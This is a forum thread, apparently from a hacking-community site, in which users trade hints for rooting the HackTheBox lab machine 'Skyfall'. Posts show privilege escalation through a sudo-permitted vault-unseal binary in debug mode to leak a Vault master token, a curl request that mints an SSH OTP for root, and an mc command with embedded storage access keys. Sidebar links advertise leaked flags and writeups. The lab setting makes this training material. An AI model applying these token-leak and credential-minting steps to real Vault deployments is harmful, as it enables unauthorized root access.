Possibly Related Threads…

KillerWhale · Feb 05, 2024, 06:40 AM

any ideas for root flag? I'm searching but no luck

GWTW · Feb 05, 2024, 07:53 AM

(Feb 05, 2024, 06:40 AM)KillerWhale Wrote: any ideas for root flag? I'm searching but no luck

For the root flag,

Dig master token according to the sudo -l (Hint: debug mode)
and generate OTP just like user OTP with vault.

There you go...

You can DM me for certain points.
Good luck!

KillerWhale · Feb 05, 2024, 07:59 AM

(Feb 05, 2024, 07:53 AM)GWTW Wrote:
(Feb 05, 2024, 06:40 AM)KillerWhale Wrote: any ideas for root flag? I'm searching but no luck

For the root flag,

Dig master token according to the sudo -l (Hint: debug mode)
and generate OTP just like user OTP with vault.

There you go...

You can DM me for certain points.
Good luck!

ok i will try it

xavior · Feb 05, 2024, 08:12 AM

curl \
--header "X-Vault-Token: $VAULT_TOKEN" \
--request POST \
--data '{"ip":"10.10.11.254", "username":"askyy"}' \
$VAULT_ADDR/v1/ssh/creds/dev_otp_key_role

this worked just fine

fuliye · Feb 05, 2024, 08:40 AM

Why can't I export the data of the machine with the mc command?，this is my command :
mc alias set cxc http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

DwightSchrute · (This post was last modified: Feb 05, 2024, 09:57 AM by DwightSchrute.)

askyy@skyfall:/sys/module$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false

askyy@skyfall:/sys/module$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v -d
2024/02/05 09:55:18 open ./debug.log: permission denied

dont get the last step..help please... Smile

vasabig888 · Feb 05, 2024, 10:11 AM

Same problem. Can anybody advice?

otaznik · Feb 05, 2024, 10:44 AM

./debug.log create as user askyy

DwightSchrute · Feb 05, 2024, 10:56 AM

got it....dont forget to chmod Wink

xavior · Feb 05, 2024, 11:16 AM

(Feb 05, 2024, 11:03 AM)bsbsmaster Wrote: anyone can help me # ./vault login
Token (will be hidden):
Error authenticating: error looking up token: Error making API request.

URL: GET http://prd23-vault-internal.skyfall.htb/...ookup-self
Code: 403. Errors:

* permission denied

https://stackoverflow.com/questions/7023...ashicorp-v

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox All Cheatsheets	Tamarisk	15	804	1 hour ago Last Post: 0x5k1z0
	CPTS-FLAG	darkcat	14	5,719	2 hours ago Last Post: Sukon
	[FREE] CPTS 12 FLAGS	pulsebreaker	78	2,594	2 hours ago Last Post: hitlerssecretsidechick
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	91	8,277	2 hours ago Last Post: hitlerssecretsidechick
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	381	94,469	5 hours ago Last Post: xixi75